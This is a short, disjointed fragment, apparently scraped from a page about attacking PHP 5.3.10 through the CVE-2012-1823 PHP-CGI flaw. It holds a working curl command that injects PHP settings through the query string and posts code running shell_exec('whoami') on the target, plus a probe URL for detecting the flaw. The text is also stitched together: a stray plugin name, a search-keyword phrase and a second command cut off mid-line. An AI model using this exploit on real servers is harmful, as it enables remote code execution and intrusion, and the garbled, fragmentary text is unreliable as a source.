wpDiscuz 
curl -k -X POST "https://target.com/index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input" \ -H "User-Agent: Mozilla/5.0" \ -d "<?php echo shell_exec('whoami'); die(); ?>"
While CVE-2012-1823 is the headline act, PHP 5.3.10 is vulnerable to a constellation of other CVEs. An attacker who finds this version will not stop at one vector. php 5.3.10 exploit
They test http://target.com/cgi-bin/php5?-s – if the source code of index.php is returned instead of execution, the CGI vulnerability is present. curl -k -X POST "https://target